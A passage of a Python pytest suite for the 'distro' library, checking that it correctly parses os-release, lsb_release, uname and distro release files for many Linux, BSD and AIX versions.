"best_version": "7.0",
"like": "fedora",
"codename": "Maipo",
}
self._test_outcome(desired_outcome)
def test_rocky_os_release(self) -> None:
desired_outcome = {
"id": "rocky",
"name": "Rocky Linux",
"pretty_name": "Rocky Linux 8.4 (Green Obsidian)",
"version": "8.4",
"pretty_version": "8.4 (Green Obsidian)",
"best_version": "8.4",
"like": "rhel centos fedora",
"codename": "Green Obsidian",
}
self._test_outcome(desired_outcome)
def test_slackware14_os_release(self) -> None:
desired_outcome = {
"id": "slackware",
"name": "Slackware",
"pretty_name": "Slackware 14.1",
"version": "14.1",
"pretty_version": "14.1",
"best_version": "14.1",
}
self._test_outcome(desired_outcome)
def test_sles12_os_release(self) -> None:
desired_outcome = {
"id": "sles",
"name": "SLES",
"pretty_name": "SUSE Linux Enterprise Server 12 SP1",
"version": "12.1",
"pretty_version": "12.1",
"best_version": "12.1",
}
self._test_outcome(desired_outcome)
def test_ubuntu14_os_release(self) -> None:
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 14.04.3 LTS",
"version": "14.04",
"pretty_version": "14.04 (Trusty Tahr)",
"best_version": "14.04.3",
"like": "debian",
"codename": "Trusty Tahr",
}
self._test_outcome(desired_outcome)
def test_ubuntu16_os_release(self) -> None:
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 16.04.1 LTS",
"version": "16.04",
"pretty_version": "16.04 (xenial)",
"best_version": "16.04.1",
"like": "debian",
"codename": "xenial",
}
self._test_outcome(desired_outcome)
def test_amazon2016_os_release(self) -> None:
desired_outcome = {
"id": "amzn",
"name": "Amazon Linux AMI",
"pretty_name": "Amazon Linux AMI 2016.03",
"version": "2016.03",
"pretty_version": "2016.03",
"best_version": "2016.03",
"like": "rhel fedora",
}
self._test_outcome(desired_outcome)
def test_scientific7_os_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Scientific Linux",
"pretty_name": "Scientific Linux 7.2 (Nitrogen)",
"version": "7.2",
"pretty_version": "7.2 (Nitrogen)",
"best_version": "7.2",
"like": "fedora",
"codename": "Nitrogen",
}
self._test_outcome(desired_outcome)
def test_gentoo_os_release(self) -> None:
desired_outcome = {
"id": "gentoo",
"name": "Gentoo",
"pretty_name": "Gentoo/Linux",
}
self._test_outcome(desired_outcome)
def test_openelec6_os_release(self) -> None:
desired_outcome = {
"id": "openelec",
"name": "OpenELEC",
"pretty_name": "OpenELEC (official) - Version: 6.0.3",
"version": "6.0",
"pretty_version": "6.0",
"best_version": "6.0.3",
}
self._test_outcome(desired_outcome)
def test_cloudlinux7_os_release(self) -> None:
desired_outcome = {
"id": "cloudlinux",
"codename": "Yury Malyshev",
"name": "CloudLinux",
"pretty_name": "CloudLinux 7.3 (Yury Malyshev)",
"like": "rhel fedora centos",
"version": "7.3",
"pretty_version": "7.3 (Yury Malyshev)",
"best_version": "7.3",
"major_version": "7",
"minor_version": "3",
}
self._test_outcome(desired_outcome)
class TestWithRootDir(TestOSRelease):
"""Test that a LinuxDistribution can be created using an arbitrary root_dir
on all OSes.
"""
def setup_method(self, test_method: FunctionType) -> None:
dist = test_method.__name__.split("_")[1]
root_dir = os.path.join(DISTROS_DIR, dist)
self.distro = distro.LinuxDistribution(
include_lsb=False,
include_uname=False,
include_oslevel=False,
os_release_file="",
distro_release_file="path-to-non-existing-file",
root_dir=root_dir,
)
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestLSBRelease(DistroTestCase):
def setup_method(self, test_method: FunctionType) -> None:
super().setup_method(test_method)
dist = test_method.__name__.split("_")[1]
self._setup_for_distro(os.path.join(DISTROS_DIR, dist))
self.distro = distro.LinuxDistribution(
os_release_file="path-to-non-existing-file",
distro_release_file="path-to-non-existing-file",
)
def _test_outcome(self, outcome: Dict[str, str]) -> None:
assert self.distro.id() == outcome.get("id", "")
assert self.distro.name() == outcome.get("name", "")
assert self.distro.name(pretty=True) == outcome.get("pretty_name", "")
assert self.distro.version() == outcome.get("version", "")
assert self.distro.version(pretty=True) == outcome.get("pretty_version", "")
assert self.distro.version(best=True) == outcome.get("best_version", "")
assert self.distro.like() == outcome.get("like", "")
assert self.distro.codename() == outcome.get("codename", "")
def test_linuxmint17_lsb_release(self) -> None:
desired_outcome = {
"id": "linuxmint",
"name": "LinuxMint",
"pretty_name": "Linux Mint 17.3 Rosa",
"version": "17.3",
"pretty_version": "17.3 (rosa)",
"best_version": "17.3",
"codename": "rosa",
}
self._test_outcome(desired_outcome)
def test_manjaro1512_lsb_release(self) -> None:
self._test_outcome(
{
"id": "manjarolinux",
"name": "ManjaroLinux",
"pretty_name": "Manjaro Linux",
"version": "15.12",
"pretty_version": "15.12 (Capella)",
"best_version": "15.12",
"codename": "Capella",
}
)
# @pytest.mark.xfail
# def test_openelec6_lsb_release(self) -> None:
# # TODO: This should be fixed as part of #109 when dealing
# # with distro inconsistencies
# desired_outcome = {
# 'id': 'openelec',
# 'name': 'OpenELEC',
# 'pretty_name': 'OpenELEC (official) - Version: 6.0.3',
# 'version': '6.0.3',
# 'pretty_version': '6.0.3',
# 'best_version': '6.0.3',
# }
# self._test_outcome(desired_outcome)
def test_openbsd62_uname(self) -> None:
self._test_outcome(
{
"id": "openbsd",
"name": "OpenBSD",
"version": "6.2",
"pretty_name": "OpenBSD 6.2",
"pretty_version": "6.2",
"best_version": "6.2",
}
)
def test_netbsd711_uname(self) -> None:
self._test_outcome(
{
"id": "netbsd",
"name": "NetBSD",
"version": "7.1.1",
"pretty_name": "NetBSD 7.1.1",
"pretty_version": "7.1.1",
"best_version": "7.1.1",
}
)
def test_freebsd111_uname(self) -> None:
self._test_outcome(
{
"id": "freebsd",
"name": "FreeBSD",
"version": "11.1",
"pretty_name": "FreeBSD 11.1",
"pretty_version": "11.1",
"best_version": "11.1",
}
)
def test_midnightbsd12_uname(self) -> None:
self._test_outcome(
{
"id": "midnightbsd",
"name": "MidnightBSD",
"version": "1.2",
"pretty_name": "MidnightBSD 1.2",
"pretty_version": "1.2",
"best_version": "1.2",
}
)
def test_ubuntu14normal_lsb_release(self) -> None:
self._setup_for_distro(os.path.join(TESTDISTROS, "lsb", "ubuntu14_normal"))
self.distro = distro.LinuxDistribution(
os_release_file="path-to-non-existing-file",
distro_release_file="path-to-non-existing-file",
)
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 14.04.3 LTS",
"version": "14.04",
"pretty_version": "14.04 (trusty)",
"best_version": "14.04.3",
"codename": "trusty",
}
self._test_outcome(desired_outcome)
def test_ubuntu14nomodules_lsb_release(self) -> None:
self._setup_for_distro(os.path.join(TESTDISTROS, "lsb", "ubuntu14_nomodules"))
self.distro = distro.LinuxDistribution(
os_release_file="path-to-non-existing-file",
distro_release_file="path-to-non-existing-file",
)
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 14.04.3 LTS",
"version": "14.04",
"pretty_version": "14.04 (trusty)",
"best_version": "14.04.3",
"codename": "trusty",
}
self._test_outcome(desired_outcome)
def test_trailingblanks_lsb_release(self) -> None:
self._setup_for_distro(
os.path.join(TESTDISTROS, "lsb", "ubuntu14_trailingblanks")
)
self.distro = distro.LinuxDistribution(
os_release_file="path-to-non-existing-file",
distro_release_file="path-to-non-existing-file",
)
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 14.04.3 LTS",
"version": "14.04",
"pretty_version": "14.04 (trusty)",
"best_version": "14.04.3",
"codename": "trusty",
}
self._test_outcome(desired_outcome)
@pytest.mark.parametrize("errnum", ("001", "002", "126", "130", "255"))
def test_lsb_release_error_level(self, errnum: str) -> None:
self._setup_for_distro(os.path.join(TESTDISTROS, "lsb", f"lsb_rc{errnum}"))
lsb_release_info = distro.LinuxDistribution(
os_release_file="path-to-non-existing-file",
distro_release_file="path-to-non-existing-file",
)._lsb_release_info
assert lsb_release_info == {}
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestSpecialRelease(DistroTestCase):
def _test_outcome(self, outcome: Dict[str, str]) -> None:
assert self.distro.id() == outcome.get("id", "")
assert self.distro.name() == outcome.get("name", "")
assert self.distro.name(pretty=True) == outcome.get("pretty_name", "")
assert self.distro.version() == outcome.get("version", "")
assert self.distro.version(pretty=True) == outcome.get("pretty_version", "")
assert self.distro.version(best=True) == outcome.get("best_version", "")
assert self.distro.like() == outcome.get("like", "")
assert self.distro.codename() == outcome.get("codename", "")
assert self.distro.major_version() == outcome.get("major_version", "")
assert self.distro.minor_version() == outcome.get("minor_version", "")
assert self.distro.build_number() == outcome.get("build_number", "")
def test_empty_release(self) -> None:
distro_release = os.path.join(SPECIAL, "empty-release")
self.distro = distro.LinuxDistribution(
include_lsb=False,
os_release_file="path-to-non-existing-file",
distro_release_file=distro_release,
)
desired_outcome = {"id": "empty"}
self._test_outcome(desired_outcome)
def test_dontincludeuname(self) -> None:
self._setup_for_distro(os.path.join(TESTDISTROS, "distro", "dontincludeuname"))
self.distro = distro.LinuxDistribution(include_uname=False)
assert self.distro.uname_attr("id") == ""
assert self.distro.uname_attr("name") == ""
assert self.distro.uname_attr("release") == ""
def test_unknowndistro_release(self) -> None:
self._setup_for_distro(os.path.join(TESTDISTROS, "distro", "unknowndistro"))
self.distro = distro.LinuxDistribution()
desired_outcome = {
"id": "unknowndistro",
"name": "Unknown Distro",
"pretty_name": "Unknown Distro 1.0 (Unknown Codename)",
"version": "1.0",
"pretty_version": "1.0 (Unknown Codename)",
"best_version": "1.0",
"codename": "Unknown Codename",
"major_version": "1",
"minor_version": "0",
}
self._test_outcome(desired_outcome)
def test_bad_uname(self) -> None:
self._setup_for_distro(os.path.join(TESTDISTROS, "distro", "baduname"))
self.distro = distro.LinuxDistribution()
assert self.distro.uname_attr("id") == ""
assert self.distro.uname_attr("name") == ""
assert self.distro.uname_attr("release") == ""
def test_empty_uname(self) -> None:
self._setup_for_distro(os.path.join(TESTDISTROS, "distro", "emptyuname"))
self.distro = distro.LinuxDistribution()
assert self.distro.uname_attr("id") == ""
assert self.distro.uname_attr("name") == ""
assert self.distro.uname_attr("release") == ""
def test_usrlibosreleaseonly(self) -> None:
self._setup_for_distro(
os.path.join(TESTDISTROS, "distro", "usrlibosreleaseonly")
)
self.distro = distro.LinuxDistribution()
desired_outcome = {
"id": "usrlibosreleaseonly",
"name": "usr_lib_os-release_only",
"pretty_name": "/usr/lib/os-release only",
}
self._test_outcome(desired_outcome)
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestDistroRelease:
def _test_outcome(
self,
outcome: Dict[str, str],
distro_name: str = "",
version: str = "",
release_file_id: str = "",
release_file_suffix: str = "release",
) -> None:
release_file_id = release_file_id or distro_name
distro_release = os.path.join(
DISTROS_DIR,
distro_name + version,
"etc",
f"{release_file_id}-{release_file_suffix}",
)
self.distro = distro.LinuxDistribution(
include_lsb=False,
os_release_file="path-to-non-existing-file",
distro_release_file=distro_release,
)
assert self.distro.id() == outcome.get("id", "")
assert self.distro.name() == outcome.get("name", "")
assert self.distro.name(pretty=True) == outcome.get("pretty_name", "")
assert self.distro.version() == outcome.get("version", "")
assert self.distro.version(pretty=True) == outcome.get("pretty_version", "")
assert self.distro.version(best=True) == outcome.get("best_version", "")
assert self.distro.like() == outcome.get("like", "")
assert self.distro.codename() == outcome.get("codename", "")
assert self.distro.major_version() == outcome.get("major_version", "")
assert self.distro.minor_version() == outcome.get("minor_version", "")
assert self.distro.build_number() == outcome.get("build_number", "")
def test_arch_dist_release(self) -> None:
desired_outcome = {"id": "arch"}
self._test_outcome(desired_outcome, "arch")
def test_centos5_dist_release(self) -> None:
desired_outcome = {
"id": "centos",
"name": "CentOS",
"pretty_name": "CentOS 5.11 (Final)",
"version": "5.11",
"pretty_version": "5.11 (Final)",
"best_version": "5.11",
"codename": "Final",
"major_version": "5",
"minor_version": "11",
}
self._test_outcome(desired_outcome, "centos", "5")
def test_centos7_dist_release(self) -> None:
desired_outcome = {
"id": "centos",
"name": "CentOS Linux",
"pretty_name": "CentOS Linux 7.1.1503 (Core)",
"version": "7.1.1503",
"pretty_version": "7.1.1503 (Core)",
"best_version": "7.1.1503",
"codename": "Core",
"major_version": "7",
"minor_version": "1",
"build_number": "1503",
}
self._test_outcome(desired_outcome, "centos", "7")
def test_fedora19_dist_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 19 (Schrödinger’s Cat)",
"version": "19",
"pretty_version": "19 (Schrödinger’s Cat)",
"best_version": "19",
"codename": "Schrödinger’s Cat",
"major_version": "19",
}
self._test_outcome(desired_outcome, "fedora", "19")
def test_fedora23_dist_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 23 (Twenty Three)",
"version": "23",
"pretty_version": "23 (Twenty Three)",
"best_version": "23",
"codename": "Twenty Three",
"major_version": "23",
}
self._test_outcome(desired_outcome, "fedora", "23")
def test_fedora30_dist_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 30 (Thirty)",
"version": "30",
"pretty_version": "30 (Thirty)",
"best_version": "30",
"codename": "Thirty",
"major_version": "30",
}
self._test_outcome(desired_outcome, "fedora", "30")
def test_gentoo_dist_release(self) -> None:
desired_outcome = {
"id": "gentoo",
"name": "Gentoo Base System",
"pretty_name": "Gentoo Base System 2.2",
"version": "2.2",
"pretty_version": "2.2",
"best_version": "2.2",
"major_version": "2",
"minor_version": "2",
}
self._test_outcome(desired_outcome, "gentoo")
def test_kvmibm1_dist_release(self) -> None:
desired_outcome = {
"id": "base",
"name": "KVM for IBM z Systems",
"pretty_name": "KVM for IBM z Systems 1.1.1 (Z)",
"version": "1.1.1",
"pretty_version": "1.1.1 (Z)",
"best_version": "1.1.1",
"codename": "Z",
"major_version": "1",
"minor_version": "1",
"build_number": "1",
}
self._test_outcome(desired_outcome, "kvmibm", "1", "base")
def test_mageia5_dist_release(self) -> None:
desired_outcome = {
"id": "mageia",
"name": "Mageia",
"pretty_name": "Mageia 5 (Official)",
"version": "5",
"pretty_version": "5 (Official)",
"best_version": "5",
"codename": "Official",
"major_version": "5",
}
self._test_outcome(desired_outcome, "mageia", "5")
def test_manjaro1512_dist_release(self) -> None:
self._test_outcome(
{
"id": "manjaro",
"name": "Manjaro Linux",
"pretty_name": "Manjaro Linux",
"version": "",
"codename": "",
},
"manjaro",
"1512",
)
def test_opensuse42_dist_release(self) -> None:
desired_outcome = {
"id": "suse",
"name": "openSUSE",
"pretty_name": "openSUSE 42.1 (x86_64)",
"version": "42.1",
"pretty_version": "42.1 (x86_64)",
"best_version": "42.1",
"codename": "x86_64",
"major_version": "42",
"minor_version": "1",
}
self._test_outcome(desired_outcome, "opensuse", "42", "SuSE")
def test_oracle7_dist_release(self) -> None:
desired_outcome = {
"id": "oracle",
"name": "Oracle Linux Server",
"pretty_name": "Oracle Linux Server 7.5",
"version": "7.5",
"pretty_version": "7.5",
"best_version": "7.5",
"major_version": "7",
"minor_version": "5",
}
self._test_outcome(desired_outcome, "oracle", "7")
def test_rhel6_dist_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Red Hat Enterprise Linux Server",
"pretty_name": "Red Hat Enterprise Linux Server 6.5 (Santiago)",
"version": "6.5",
"pretty_version": "6.5 (Santiago)",
"best_version": "6.5",
"codename": "Santiago",
"major_version": "6",
"minor_version": "5",
}
self._test_outcome(desired_outcome, "rhel", "6", "redhat")
def test_rhel7_dist_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Red Hat Enterprise Linux Server",
"pretty_name": "Red Hat Enterprise Linux Server 7.0 (Maipo)",
"version": "7.0",
"pretty_version": "7.0 (Maipo)",
"best_version": "7.0",
"codename": "Maipo",
"major_version": "7",
"minor_version": "0",
}
self._test_outcome(desired_outcome, "rhel", "7", "redhat")
def test_slackware14_dist_release(self) -> None:
desired_outcome = {
"id": "slackware",
"name": "Slackware",
"pretty_name": "Slackware 14.1",
"version": "14.1",
"pretty_version": "14.1",
"best_version": "14.1",
"major_version": "14",
"minor_version": "1",
}
self._test_outcome(
desired_outcome, "slackware", "14", release_file_suffix="version"
)
def test_sles12_dist_release(self) -> None:
desired_outcome = {
"id": "suse",
"name": "SUSE Linux Enterprise Server",
"pretty_name": "SUSE Linux Enterprise Server 12 (s390x)",
"version": "12",
"pretty_version": "12 (s390x)",
"best_version": "12",
"major_version": "12",
"codename": "s390x",
}
self._test_outcome(desired_outcome, "sles", "12", "SuSE")
def test_cloudlinux5_dist_release(self) -> None:
# Uses redhat-release only to get information.
# The id of 'rhel' can only be fixed with issue #109.
desired_outcome = {
"id": "cloudlinux",
"codename": "Vladislav Volkov",
"name": "CloudLinux Server",
"pretty_name": "CloudLinux Server 5.11 (Vladislav Volkov)",
"version": "5.11",
"pretty_version": "5.11 (Vladislav Volkov)",
"best_version": "5.11",
"major_version": "5",
"minor_version": "11",
}
self._test_outcome(desired_outcome, "cloudlinux", "5", "redhat")
def test_cloudlinux6_dist_release(self) -> None:
# Same as above, only has redhat-release.
desired_outcome = {
"id": "cloudlinux",
"codename": "Oleg Makarov",
"name": "CloudLinux Server",
"pretty_name": "CloudLinux Server 6.8 (Oleg Makarov)",
"version": "6.8",
"pretty_version": "6.8 (Oleg Makarov)",
"best_version": "6.8",
"major_version": "6",
"minor_version": "8",
}
self._test_outcome(desired_outcome, "cloudlinux", "6", "redhat")
def test_cloudlinux7_dist_release(self) -> None:
desired_outcome = {
"id": "cloudlinux",
"codename": "Yury Malyshev",
"name": "CloudLinux",
"pretty_name": "CloudLinux 7.3 (Yury Malyshev)",
"version": "7.3",
"pretty_version": "7.3 (Yury Malyshev)",
"best_version": "7.3",
"major_version": "7",
"minor_version": "3",
}
self._test_outcome(desired_outcome, "cloudlinux", "7", "redhat")
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestOverall(DistroTestCase):
"""Test a LinuxDistribution object created with default arguments.
The direct accessor functions on that object are tested (e.g. `id()`); they
implement the precedence between the different sources of information.
In addition, because the distro release file is searched when not
specified, the information resulting from the distro release file is also
tested. The LSB and os-release sources are not tested again, because their
test is already done in TestLSBRelease and TestOSRelease, and their
algorithm does not depend on whether or not the file is specified.
TODO: This class should have testcases for all distros that are claimed
    to be reliably maintained w.r.t. their ID (see `id()`). Testcases for
    the following distros are still missing:
      * `gentoo` - Gentoo Linux
* `ibm_powerkvm` - IBM PowerKVM
* `parallels` - Parallels
* `pidora` - Pidora (Fedora remix for Raspberry Pi)
* `raspbian` - Raspbian
* `scientific` - Scientific Linux
* `xenserver` - XenServer
"""
def setup_method(self, test_method: FunctionType) -> None:
super().setup_method(test_method)
dist = test_method.__name__.split("_")[1]
self._setup_for_distro(os.path.join(DISTROS_DIR, dist))
self.distro = distro.LinuxDistribution()
def _test_outcome(self, outcome: Dict[str, str]) -> None:
assert self.distro.id() == outcome.get("id", "")
assert self.distro.name() == outcome.get("name", "")
assert self.distro.name(pretty=True) == outcome.get("pretty_name", "")
assert self.distro.version() == outcome.get("version", "")
assert self.distro.version(pretty=True) == outcome.get("pretty_version", "")
assert self.distro.version(best=True) == outcome.get("best_version", "")
assert self.distro.like() == outcome.get("like", "")
assert self.distro.codename() == outcome.get("codename", "")
assert self.distro.major_version() == outcome.get("major_version", "")
assert self.distro.minor_version() == outcome.get("minor_version", "")
assert self.distro.build_number() == outcome.get("build_number", "")
def _test_non_existing_release_file(self) -> None:
        # Test the info from the searched distro release file
        # when the distro does not have one.
assert self.distro.distro_release_file == ""
assert len(self.distro.distro_release_info()) == 0
def _test_release_file_info(
self, filename: str, outcome: Dict[str, str]
) -> Dict[str, str]:
# Test the info from the searched distro release file
assert os.path.basename(self.distro.distro_release_file) == filename
distro_info = self.distro.distro_release_info()
for key, value in outcome.items():
assert distro_info[key] == value
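        # Return the parsed info so callers can also assert that keys are absent.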
return distro_info
def test_arch_release(self) -> None:
desired_outcome = {
"id": "arch",
"name": "Arch Linux",
"pretty_name": "Arch Linux",
}
self._test_outcome(desired_outcome)
        # Test the info from the searched distro release file.
        # Arch does not have one; the empty /etc/arch-release file is not
        # considered a valid distro release file:
self._test_non_existing_release_file()
def test_aix72_release(self) -> None:
desired_outcome = {
"id": "aix",
"name": "AIX",
"pretty_name": "AIX 7.2.0.0",
"version": "7.2.0.0",
"pretty_version": "7.2.0.0",
"best_version": "7.2.0.0",
"major_version": "7",
"minor_version": "2",
"build_number": "0",
}
self._test_outcome(desired_outcome)
def test_centos5_release(self) -> None:
desired_outcome = {
"id": "centos",
"name": "CentOS",
"pretty_name": "CentOS 5.11 (Final)",
"version": "5.11",
"pretty_version": "5.11 (Final)",
"best_version": "5.11",
"codename": "Final",
"major_version": "5",
"minor_version": "11",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "centos",
"name": "CentOS",
"version_id": "5.11",
"codename": "Final",
}
self._test_release_file_info("centos-release", desired_info)
def test_centos7_release(self) -> None:
desired_outcome = {
"id": "centos",
"name": "CentOS Linux",
"pretty_name": "CentOS Linux 7 (Core)",
"version": "7",
"pretty_version": "7 (Core)",
"best_version": "7.1.1503",
"like": "rhel fedora",
"codename": "Core",
"major_version": "7",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "centos",
"name": "CentOS Linux",
"version_id": "7.1.1503",
"codename": "Core",
}
self._test_release_file_info("centos-release", desired_info)
def test_coreos_release(self) -> None:
desired_outcome = {
"id": "coreos",
"name": "CoreOS",
"pretty_name": "CoreOS 899.15.0",
"version": "899.15.0",
"pretty_version": "899.15.0",
"best_version": "899.15.0",
"major_version": "899",
"minor_version": "15",
"build_number": "0",
}
self._test_outcome(desired_outcome)
self._test_non_existing_release_file()
def test_debian8_release(self) -> None:
desired_outcome = {
"id": "debian",
"name": "Debian GNU/Linux",
"pretty_name": "Debian GNU/Linux 8 (jessie)",
"version": "8",
"pretty_version": "8 (jessie)",
"best_version": "8.2",
"codename": "jessie",
"major_version": "8",
}
self._test_outcome(desired_outcome)
self._test_non_existing_release_file()
def test_exherbo_release(self) -> None:
desired_outcome = {
"id": "exherbo",
"name": "Exherbo",
"pretty_name": "Exherbo Linux",
}
self._test_outcome(desired_outcome)
def test_fedora19_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 19 (Schrödinger’s Cat)",
"version": "19",
"pretty_version": "19 (Schrödinger’s Cat)",
"best_version": "19",
"codename": "Schrödinger’s Cat",
"major_version": "19",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "fedora",
"name": "Fedora",
"version_id": "19",
"codename": "Schrödinger’s Cat",
}
self._test_release_file_info("fedora-release", desired_info)
def test_fedora23_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 23 (Twenty Three)",
"version": "23",
"pretty_version": "23 (Twenty Three)",
"best_version": "23",
"codename": "Twenty Three",
"major_version": "23",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "fedora",
"name": "Fedora",
"version_id": "23",
"codename": "Twenty Three",
}
self._test_release_file_info("fedora-release", desired_info)
def test_fedora30_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 30 (Thirty)",
"version": "30",
"pretty_version": "30",
"best_version": "30",
"codename": "",
"major_version": "30",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "fedora",
"name": "Fedora",
"version_id": "30",
"codename": "Thirty",
}
self._test_release_file_info("fedora-release", desired_info)
def test_kvmibm1_release(self) -> None:
desired_outcome = {
"id": "kvmibm",
"name": "KVM for IBM z Systems",
"pretty_name": "KVM for IBM z Systems 1.1.1 (Z)",
"version": "1.1.1",
"pretty_version": "1.1.1 (Z)",
"best_version": "1.1.1",
"like": "rhel fedora",
"codename": "Z",
"major_version": "1",
"minor_version": "1",
"build_number": "1",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "base",
"name": "KVM for IBM z Systems",
"version_id": "1.1.1",
"codename": "Z",
}
self._test_release_file_info("base-release", desired_info)
def test_linuxmint17_release(self) -> None:
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 14.04.3 LTS",
"version": "14.04",
"pretty_version": "14.04 (Trusty Tahr)",
"best_version": "14.04.3",
"like": "debian",
"codename": "Trusty Tahr",
"major_version": "14",
"minor_version": "04",
}
self._test_outcome(desired_outcome)
self._test_non_existing_release_file()
def test_mageia5_release(self) -> None:
desired_outcome = {
"id": "mageia",
"name": "Mageia",
"pretty_name": "Mageia 5",
"version": "5",
"pretty_version": "5 (thornicroft)",
"best_version": "5",
"like": "mandriva fedora",
# TODO: Codename differs between distro release and lsb_release.
"codename": "thornicroft",
"major_version": "5",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "mageia",
"name": "Mageia",
"version_id": "5",
"codename": "Official",
}
self._test_release_file_info("mageia-release", desired_info)
def test_manjaro1512_release(self) -> None:
self._test_outcome(
{
"id": "manjaro",
"name": "Manjaro Linux",
"pretty_name": "Manjaro Linux",
"version": "15.12",
"pretty_version": "15.12 (Capella)",
"best_version": "15.12",
"major_version": "15",
"minor_version": "12",
"codename": "Capella",
}
)
self._test_release_file_info(
"manjaro-release", {"id": "manjaro", "name": "Manjaro Linux"}
)
def test_opensuse42_release(self) -> None:
desired_outcome = {
"id": "opensuse",
"name": "openSUSE Leap",
"pretty_name": "openSUSE Leap 42.1 (x86_64)",
"version": "42.1",
"pretty_version": "42.1 (x86_64)",
"best_version": "42.1",
"like": "suse",
"codename": "x86_64",
"major_version": "42",
"minor_version": "1",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "SuSE",
"name": "openSUSE",
"version_id": "42.1",
"codename": "x86_64",
}
self._test_release_file_info("SuSE-release", desired_info)
def test_opensuse15_release(self) -> None:
desired_outcome = {
"id": "opensuse",
"name": "openSUSE Leap",
"pretty_name": "openSUSE Leap 15.2",
"version": "15.2",
"pretty_version": "15.2",
"best_version": "15.2",
"like": "suse opensuse",
"major_version": "15",
"minor_version": "2",
}
self._test_outcome(desired_outcome)
def test_oracle7_release(self) -> None:
desired_outcome = {
"id": "oracle",
"name": "Oracle Linux Server",
"pretty_name": "Oracle Linux Server 7.5",
"version": "7.5",
"pretty_version": "7.5",
"best_version": "7.5",
"major_version": "7",
"minor_version": "5",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "oracle",
"name": "Oracle Linux Server",
"version_id": "7.5",
}
distro_info = self._test_release_file_info("oracle-release", desired_info)
assert "codename" not in distro_info
def test_raspbian7_release(self) -> None:
desired_outcome = {
"id": "raspbian",
"name": "Raspbian GNU/Linux",
"pretty_name": "Raspbian GNU/Linux 7 (wheezy)",
"version": "7",
"pretty_version": "7 (wheezy)",
"best_version": "7",
"like": "debian",
"codename": "wheezy",
"major_version": "7",
}
self._test_outcome(desired_outcome)
self._test_non_existing_release_file()
def test_raspbian8_release(self) -> None:
desired_outcome = {
"id": "raspbian",
"name": "Raspbian GNU/Linux",
"pretty_name": "Raspbian GNU/Linux 8 (jessie)",
"version": "8",
"pretty_version": "8 (jessie)",
"best_version": "8",
"like": "debian",
"codename": "jessie",
"major_version": "8",
}
self._test_outcome(desired_outcome)
self._test_non_existing_release_file()
def test_rhel5_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Red Hat Enterprise Linux Server",
"pretty_name": "Red Hat Enterprise Linux Server 5.11 (Tikanga)",
"version": "5.11",
"pretty_version": "5.11 (Tikanga)",
"best_version": "5.11",
"codename": "Tikanga",
"major_version": "5",
"minor_version": "11",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "redhat",
"name": "Red Hat Enterprise Linux Server",
"version_id": "5.11",
"codename": "Tikanga",
}
self._test_release_file_info("redhat-release", desired_info)
def test_rhel6_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Red Hat Enterprise Linux Server",
"pretty_name": "Red Hat Enterprise Linux Server 6.5 (Santiago)",
"version": "6.5",
"pretty_version": "6.5 (Santiago)",
"best_version": "6.5",
"codename": "Santiago",
"major_version": "6",
"minor_version": "5",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "redhat",
"name": "Red Hat Enterprise Linux Server",
"version_id": "6.5",
"codename": "Santiago",
}
self._test_release_file_info("redhat-release", desired_info)
def test_rhel7_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Red Hat Enterprise Linux Server",
"pretty_name": "Red Hat Enterprise Linux Server 7.0 (Maipo)",
"version": "7.0",
"pretty_version": "7.0 (Maipo)",
"best_version": "7.0",
"like": "fedora",
"codename": "Maipo",
"major_version": "7",
"minor_version": "0",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "redhat",
"name": "Red Hat Enterprise Linux Server",
"version_id": "7.0",
"codename": "Maipo",
}
self._test_release_file_info("redhat-release", desired_info)
def test_rocky_release(self) -> None:
desired_outcome = {
"id": "rocky",
"name": "Rocky Linux",
"pretty_name": "Rocky Linux 8.4 (Green Obsidian)",
"version": "8.4",
"pretty_version": "8.4 (Green Obsidian)",
"best_version": "8.4",
"like": "rhel centos fedora",
"codename": "Green Obsidian",
"major_version": "8",
"minor_version": "4",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "centos",
"name": "Rocky Linux",
"version_id": "8.4",
"codename": "Green Obsidian",
}
self._test_release_file_info("centos-release", desired_info)
def test_slackware14_release(self) -> None:
desired_outcome = {
"id": "slackware",
"name": "Slackware",
"pretty_name": "Slackware 14.1",
"version": "14.1",
"pretty_version": "14.1",
"best_version": "14.1",
"major_version": "14",
"minor_version": "1",
}
self._test_outcome(desired_outcome)
